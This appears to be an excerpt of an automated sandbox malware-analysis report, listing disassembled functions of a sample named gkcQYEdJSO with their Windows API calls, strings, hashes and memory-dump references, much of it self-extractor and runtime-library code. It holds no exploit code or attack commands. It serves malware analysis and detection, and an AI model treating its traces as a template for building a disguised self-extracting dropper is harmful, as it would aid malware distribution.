Instruction Fuzzy Hash: 9B51E170008380AEDF319F659854BABBBE6AF41744F08441FF5C0A7391E7729A88DB72

Function 00DEA95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00DE5695,00DE5695,?,?,?,00DEABAC,00000001,00000001,2DE85006), ref: 00DEA9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00DEABAC,00000001,00000001,2DE85006,?,?,?), ref: 00DEAA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00DEAB35
__freea.LIBCMT ref: 00DEAB42

Part of subcall function 00DE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00DECA2C,00000000,?,00DE6CBE,?,00000008,?,00DE91E0,?,?,?), ref: 00DE8E38

__freea.LIBCMT ref: 00DEAB4B
__freea.LIBCMT ref: 00DEAB70

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: d26ac5ceef1ae79d874aa3b7cc194acfbafb124fd3ea1577670b61e12be0e4ff
Instruction ID: 06ec256752ce15c3dbe01fb5c42b0b4fd43cfbd89a51f479b03f1c7b429ba3a7
Opcode Fuzzy Hash: d26ac5ceef1ae79d874aa3b7cc194acfbafb124fd3ea1577670b61e12be0e4ff
Instruction Fuzzy Hash: BB51D572600257AFDB25AF6ACC41EBFB7AAEB44750F194629FC04D6140EB34EC40D6B1

Function 00DE3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00DE3C35,?,?,00E22088,00000000,?,00DE3D60,00000004,InitializeCriticalSectionEx,00DF6394,InitializeCriticalSectionEx,00000000), ref: 00DE3C03

Strings

api-ms-, xrefs: 00DE3BC3

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 036c01bda772c9a7b2063a55760705422201c7538c9c5fa6f1f7d9f34c9f07f8
Instruction ID: 6736c99a43ef7a2052f3f412710325a8ca420dbcab94ce6943f1251fcbb787d4
Opcode Fuzzy Hash: 036c01bda772c9a7b2063a55760705422201c7538c9c5fa6f1f7d9f34c9f07f8
Instruction Fuzzy Hash: 2611E731A04264ABCB21AB5ADC49B7E37649F01770F2A4111E916FB290D730EF00C6F5

Function 00DDAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DD0836
Part of subcall function 00DD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DCF2D8,Crypt32.dll,00000000,00DCF35C,?,?,00DCF33E,?,?,?), ref: 00DD0858

OleInitialize.OLE32(00000000), ref: 00DDAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00DDAC66
SHGetMalloc.SHELL32(00E08438), ref: 00DDAC70

Strings

3Ro, xrefs: 00DDAC47
riched20.dll, xrefs: 00DDAC1E

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Ro
API String ID: 3498096277-3613677438
Opcode ID: 4d69a244493e8db3b320a76f1c758d7b947c378e1e4349d7ccf08e695b71e328
Instruction ID: 90c9f5bce24eb4e55090319f0ecaac809a927b59b1f88700ce8cafe4c7d760d2
Opcode Fuzzy Hash: 4d69a244493e8db3b320a76f1c758d7b947c378e1e4349d7ccf08e695b71e328
Instruction Fuzzy Hash: 17F0FFB1D00209AFCB10AFAAD949DAFFFFCEF94700F004156A455B2241DBB856468FB1

Function 00DC98E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00DC7760,?,00000005,?,00000011), ref: 00DC995F
GetLastError.KERNEL32(?,?,00DC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00DC996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00DC7760,?,00000005,?), ref: 00DC99A2
GetLastError.KERNEL32(?,?,00DC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00DC99AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00DC7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00DC99F9

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 48d3972570c28dbb497ebb289f0cdfed0dadbbc27bae0bb9bfd5cdbf02012422
Instruction ID: 938339785e24340c2f6e4f7e9da93dd9a62f45044a0904b65a8f3b636568155a
Opcode Fuzzy Hash: 48d3972570c28dbb497ebb289f0cdfed0dadbbc27bae0bb9bfd5cdbf02012422
Instruction Fuzzy Hash: DD31F0305447466BE7209F24CC4AFAAFB94BB05320F181B1EF9A1972D0DBB4A954CFB1

Function 00DDB568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DDB579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DDB58A
IsDialogMessageW.USER32(00010466,?), ref: 00DDB59E
TranslateMessage.USER32(?), ref: 00DDB5AC
DispatchMessageW.USER32(?), ref: 00DDB5B6

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 7964292897dac6afc770bfdf1b5304bc0f52b96396065136132aec18e17be16e
Instruction ID: 1acf865895d02e180cef633b37178c34ef75c74da7f0996e47edcf4663b64f2e
Opcode Fuzzy Hash: 7964292897dac6afc770bfdf1b5304bc0f52b96396065136132aec18e17be16e
Instruction Fuzzy Hash: 2AF0BD71A0111AAF8B309BF6AC4CDDB7FACEF057A57044416B515E2150EB38E60ACFB4

Function 00DDABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00DDABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00DDABF9

Part of subcall function 00DD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00DCC116,00000000,.exe,?,?,00000800,?,?,?,00DD8E3C), ref: 00DD1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00DDABE9

Strings

EDIT, xrefs: 00DDABCD, 00DDABD8, 00DDABE5

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 7acfa25b39cf31abd947424f6547787e5c5a2ff254ba2be33dd4f6edccb761d1
Instruction ID: ff61a7742ba75e68f5524c5091ce16f9b31ccfa85a3deac3b4c774c516493d2d
Opcode Fuzzy Hash: 7acfa25b39cf31abd947424f6547787e5c5a2ff254ba2be33dd4f6edccb761d1
Instruction Fuzzy Hash: 48F082326012287ADB3057399C09F9B776C9F46B40F498013BA05B22C0D765EA4A89BA

Function 00DDDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00DDDBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00DDDC30

Strings

sfxcmd, xrefs: 00DDDBEF
sfxpar, xrefs: 00DDDC2B

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 3273b6b05dbc28b50e89667568e5847ded7d5ef246aec2b437d5308d4017616f
Instruction ID: e3a35ef568213490a71f822bbb0c629fcae92bec8481077e0004cca684a9235d
Opcode Fuzzy Hash: 3273b6b05dbc28b50e89667568e5847ded7d5ef246aec2b437d5308d4017616f
Instruction Fuzzy Hash: 71F0EC724143286BCF202F989C06FFA3B59EF08781F054412FE85D6355D6B09950D6B0

Function 00DC9785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00DC9795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00DC97AD
GetLastError.KERNEL32 ref: 00DC97DF
GetLastError.KERNEL32 ref: 00DC97FE

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 315312273f81a3b5025c8930718998f36693f896d666f6cedf29cb6080338e5a
Instruction ID: a7b45593c64b6071b97f936095d4a481931262f1b2847a9f3cd7b73cc7344a84
Opcode Fuzzy Hash: 315312273f81a3b5025c8930718998f36693f896d666f6cedf29cb6080338e5a
Instruction Fuzzy Hash: 14117C31910206EBDF205F64C818F69B7A9FF42321F148A2EE456C7290DB74DE44DB71

Function 00DEAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00DE3F73,00000000,00000000,?,00DEACDB,00DE3F73,00000000,00000000,00000000,?,00DEAED8,00000006,FlsSetValue), ref: 00DEAD66
GetLastError.KERNEL32(?,00DEACDB,00DE3F73,00000000,00000000,00000000,?,00DEAED8,00000006,FlsSetValue,00DF7970,FlsSetValue,00000000,00000364,?,00DE98B7), ref: 00DEAD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00DEACDB,00DE3F73,00000000,00000000,00000000,?,00DEAED8,00000006,FlsSetValue,00DF7970,FlsSetValue,00000000), ref: 00DEAD80

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: fb75902b230e337f57d308ad970c97392a71f43f04cbc315516855c64fa24547
Instruction ID: 3e7a31aedefb55a049786390c08b6d3e4948cec2bad541b29c18ca3bc52c9825
Opcode Fuzzy Hash: fb75902b230e337f57d308ad970c97392a71f43f04cbc315516855c64fa24547
Instruction Fuzzy Hash: 0D01F736201763ABC7215E6E9C44AA77B98EF05BA27194620F916D7650EB20E801C6F1

Function 00DC9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00DCD343,00000001,?,?,?,00000000,00DD551D,?,?,?), ref: 00DC9F9E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00DD551D,?,?,?,?,?,00DD4FC7,?), ref: 00DC9FE5
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00DCD343,00000001,?,?), ref: 00DCA011

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: e759cc45d8600b0239889de1ba2f2ce2a1d524eb3c0cabf753031c0168dc5138
Instruction ID: 32f258a8d0a4cab1ef6e9dca0e96807063c4970f671212a717022cc2bd2a6cbc
Opcode Fuzzy Hash: e759cc45d8600b0239889de1ba2f2ce2a1d524eb3c0cabf753031c0168dc5138
Instruction Fuzzy Hash: 1931A07120430AAFDB14CF24D818F6EB7A5EF84755F14461DF9819B290CB75AE48CBB2

Function 00DCA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00DCC27E: _wcslen.LIBCMT ref: 00DCC284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00DCA175,?,00000001,00000000,?,?), ref: 00DCA2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00DCA175,?,00000001,00000000,?,?), ref: 00DCA30C
GetLastError.KERNEL32(?,?,?,?,00DCA175,?,00000001,00000000,?,?), ref: 00DCA329

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: dd9d77327e65672f89ab802b1160f1d1f447bb3809d6933b523064d6e2991673
Instruction ID: 7a9ca71562d71454bf105215003e2520012ff55577755db2b8ffecab009a117b
Opcode Fuzzy Hash: dd9d77327e65672f89ab802b1160f1d1f447bb3809d6933b523064d6e2991673
Instruction Fuzzy Hash: BE01B53120026A6AEF21ABF94C59FFD7748DF0A789F08441DF941D7185DB54CA81C6B6

Function 00DEB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00DEB8B8

Strings

, xrefs: 00DEB8FD

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: cd82a78364bd46959e66591ea52c50443969984b274ce24aaed8b0145725fb31
Instruction ID: 7faad6f80587b4b4ded96f82ae5f5b08f7e949948d112adfa42a0ad9151d2e3f
Opcode Fuzzy Hash: cd82a78364bd46959e66591ea52c50443969984b274ce24aaed8b0145725fb31
Instruction Fuzzy Hash: 1541D47050438C9ADB219E6A8C84BF7BBE9EB45314F1804EEE5DA86243D335BA45DF70

Function 00DEAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00DEAFDD

Strings

LCMapStringEx, xrefs: 00DEAF7D, 00DEAF87

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: bd4028bf3b0eb9f504ef57ff89f2ef7f19cc0a4f828130e88aa40f183fb0b80c
Instruction ID: 4959130f33cf4cc5ef5b9f4716cd250050fbf52623134c480e8e2c70686f373c
Opcode Fuzzy Hash: bd4028bf3b0eb9f504ef57ff89f2ef7f19cc0a4f828130e88aa40f183fb0b80c
Instruction Fuzzy Hash: 3A01253250420EBBCF02AF95DC02DEE7F62EF08750F028155FE1466260CB729A31EBA1

Function 00DEAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00DEA56F), ref: 00DEAF55

Strings

InitializeCriticalSectionEx, xrefs: 00DEAF1B, 00DEAF25

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: afb42c2fae050d6fe1eeac99baaac23bb280243b4d9d940caa94f2bcae4b5f6c
Instruction ID: ad56f913a5920eb51e88f7a899ade22874dc40e0c48770586d24b1d4bf66980b
Opcode Fuzzy Hash: afb42c2fae050d6fe1eeac99baaac23bb280243b4d9d940caa94f2bcae4b5f6c
Instruction Fuzzy Hash: 8CF0B431A4520DBFCB016F55DC02CBE7F61EF04B11B028055FD099A360DA715E20DBB6

Function 00DEADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00DEADEE

Strings

FlsAlloc, xrefs: 00DEADC0, 00DEADCA

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 3f6a9df6ec330c529701fa2d1a740ac25744ff249ac13f18687e753a52e8c2ac
Instruction ID: f8c73e4b0d62add8ccbabfafc0e95d2583d5e043adfe90f6490177fff77a09ec
Opcode Fuzzy Hash: 3f6a9df6ec330c529701fa2d1a740ac25744ff249ac13f18687e753a52e8c2ac
Instruction Fuzzy Hash: 4DE0E531B4531D7BC611BB6ADC029BEBB54DB04B21B028199F90597350DDB16F40CAFA

Function 00DDEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DDEAF9

Part of subcall function 00DDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DDE8D0
Part of subcall function 00DDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DDE8E1

Strings

3Ro, xrefs: 00DDEAE7, 00DDEAF3

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
